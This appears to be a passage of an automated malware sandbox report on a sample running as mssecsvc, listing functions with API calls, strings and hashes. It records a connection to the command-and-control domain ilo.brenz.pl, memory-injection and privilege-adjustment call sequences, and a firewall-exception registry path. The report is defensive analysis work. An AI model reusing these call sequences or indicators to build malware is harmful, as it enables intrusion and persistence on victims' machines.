                                                                                • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction Fuzzy Hash: A31180B1500606BBFB254F20DC4EFFF7A6DEF88B10F104529FA0699080DBF59E5196A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA4C9E Relevance: 8.4, Strings: 6, Instructions: 887COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                • String ID: !$&$&$($@$nr
                                                                                • API String ID: 1961427682-1764398444
                                                                                • Opcode ID: bf04dd4e4360f2a7c1138d4e91d6eeb8138924affbd26b01491c77224000adc4
                                                                                • Instruction ID: 70d54eaa6d8cb414026f6c3a7bcc54b949e10ab183c4402b4bf19285d7a76c5b
                                                                                • Opcode Fuzzy Hash: bf04dd4e4360f2a7c1138d4e91d6eeb8138924affbd26b01491c77224000adc4
                                                                                • Instruction Fuzzy Hash: 8D823232505309EFDB26CF28C4457B97BBAEF41328F105259D81A8F295D3B69F94CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA24AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\reytVt), ref: 7FEA24BA
                                                                                • lstrlenW.KERNEL32(?), ref: 7FEA24C1
                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FEA2516
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 7FEA24B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 2597515329-2991043827
                                                                                • Opcode ID: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction ID: 5c983cd9f1cd20ee1585cb2043f0ac7b7c4d8b3eb9a0e14b844aaf5402aa3d02
                                                                                • Opcode Fuzzy Hash: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction Fuzzy Hash: 470181B0781344BAF7309B29CC4BF5B7929DF81B50F508558F609AE1C4DAB89A0483A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B924AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\reytVt), ref: 00B924BA
                                                                                • lstrlenW.KERNEL32(?), ref: 00B924C1
                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00B92516
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 00B924B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 2597515329-2991043827
                                                                                • Opcode ID: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction ID: 680601ef21d2206de906d06a7dabd6da05f40caf335e257e0c27b3e93d30fa21
                                                                                • Opcode Fuzzy Hash: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction Fuzzy Hash: 030181B0781344BAF7309B29CC4BF5B7D69DF81B50F508558F609AE1C4DAB89A0483A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 7FEA254B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenSection
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 1950954290-2991043827
                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA2574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 7FEA252F: NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 7FEA25A4
                                                                                • CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,7FEA0815), ref: 7FEA25AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Section$CloseHandleOpenView
                                                                                • String ID:
                                                                                • API String ID: 2731707328-0
                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction ID: 3cc34a18b6b0f74ef45f64819b33cb598c6401d77195fbf03454f98489c8026e
                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction Fuzzy Hash: 9A21F970301646BBDB18DE65CC55FBA7369FF80648F401118E85ABE1D4DBB2BA24C758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA1422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA2477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FEA249B
                                                                                • NtWriteVirtualMemory.NTDLL ref: 7FEA24A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                • String ID:
                                                                                • API String ID: 151266762-0
                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA28C8 Relevance: .1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction ID: 599e4210a27b95691828082bf071d632d483ec5813d8a2b375e76b2b2bcd3a21
                                                                                • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction Fuzzy Hash: 6A31F5326006158BEB148E38C94079AB7F2FB84704F10C63CE557FB594D676F6898BC0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B928C8 Relevance: .1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction ID: 1a2b5fff46c5b670e9fe0eeaeab5ab2a4880aafd6ba5f40914bebdbede8120cd
                                                                                • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction Fuzzy Hash: 3D310532A006159BEF188F38C845B9AB7E2FB94304F10867CE556E7580E675EA898BC0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA025E Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction ID: 2ef5a1d6ad88e75d5911a7d47f6b3f6173312025dec9f347c6a54f7b135bd9c7
                                                                                • Opcode Fuzzy Hash: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction Fuzzy Hash: 6E0128327053419BC7219F38CCC4FAEBBA2EBC4734F118325E6540E189D632E241C661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B9025E Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction ID: 382eb8fb3695c9b87e3f5c6b506c6dbfe6ba806449a21943bcb5c8ce0e9fc978
                                                                                • Opcode Fuzzy Hash: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction Fuzzy Hash: 9E01F1322141459FCB20BF28CC89A9EBBE2EB89734F1083B4F4945A185D631A2818691
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                                                                                • WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 7FEA4322
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$ilo.brenz.pl
                                                                                • API String ID: 3316401344-1341573493
                                                                                • Opcode ID: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
                                                                                • Instruction ID: 1da76589fb4dd87b5df105d6ae65f4369b8eb418b0376c81cadce6663e0d34e8
                                                                                • Opcode Fuzzy Hash: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
                                                                                • Instruction Fuzzy Hash: 1391EC71508348BEEB229F348859BEE7FAEEF41304F000648E85A9E191C3F66F45DB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00B93F83), ref: 00B93F8F
                                                                                • WSAStartup.WS2_32(00000101), ref: 00B93FCE
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B94057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B94066
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
                                                                                • connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
                                                                                • wsprintfA.USER32 ref: 00B94179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B941B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B941BD
                                                                                • GetTickCount.KERNEL32 ref: 00B941F6
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00B94322
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$ilo.brenz.pl
                                                                                • API String ID: 3316401344-1341573493
                                                                                • Opcode ID: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
                                                                                • Instruction ID: e1499c7a4c9dfb18f853e2662a19a3ad779620544526f79d38743789921cc4dc
                                                                                • Opcode Fuzzy Hash: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
                                                                                • Instruction Fuzzy Hash: 7091B731518248BAEF319F34881DBAA7BADEF46300F0446A8E95A9E181C3F45F46CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(7FEA3EA9), ref: 7FEA3EB5
                                                                                  • Part of subcall function 7FEA3ECC: GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                                                                                  • Part of subcall function 7FEA3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
                                                                                  • Part of subcall function 7FEA3ECC: wsprintfA.USER32 ref: 7FEA3EF7
                                                                                  • Part of subcall function 7FEA3ECC: CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                  • Part of subcall function 7FEA3ECC: CloseHandle.KERNEL32(?,6EF1083C), ref: 7FEA3F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 4150863296-2871364490
                                                                                • Opcode ID: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction ID: a15a6457230e598bb6ef6cbbffa0e8635eaa4eb844119d8f0639b47af27d7a61
                                                                                • Opcode Fuzzy Hash: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction Fuzzy Hash: A3A1FF71419348BFEB219F348C49BFA7BACEF41304F004659E84A9E092D6F66F05C7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00B93EA9), ref: 00B93EB5
                                                                                  • Part of subcall function 00B93ECC: GetProcAddress.KERNEL32(00000000,00B93EC0), ref: 00B93ECD
                                                                                  • Part of subcall function 00B93ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
                                                                                  • Part of subcall function 00B93ECC: wsprintfA.USER32 ref: 00B93EF7
                                                                                  • Part of subcall function 00B93ECC: CreateThread.KERNEL32(00000000,00000000,00B93691,00000000,00000000), ref: 00B93F40
                                                                                  • Part of subcall function 00B93ECC: CloseHandle.KERNEL32(?,6EF1083C), ref: 00B93F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
                                                                                • connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
                                                                                • wsprintfA.USER32 ref: 00B94179
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 4150863296-2871364490
                                                                                • Opcode ID: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction ID: bb5e24d1dd9fef075b998dd97aa8f82625ae5d5d32f963d553afe18280bc9283
                                                                                • Opcode Fuzzy Hash: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction Fuzzy Hash: EFA1EE71418258BFEF219F248C5ABEA7BECEF42300F0445A9E8499E082D3F45F46C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
                                                                                • wsprintfA.USER32 ref: 7FEA3EF7
                                                                                • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 7FEA3F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                  • Part of subcall function 7FEA3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                  • Part of subcall function 7FEA3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                  • Part of subcall function 7FEA3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                  • Part of subcall function 7FEA3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                  • Part of subcall function 7FEA3405: UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 541178049-2871364490
                                                                                • Opcode ID: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction ID: d9e398f0cb57442fd0ba00def27d3fe33590f3ea382637dc010686527708efc5
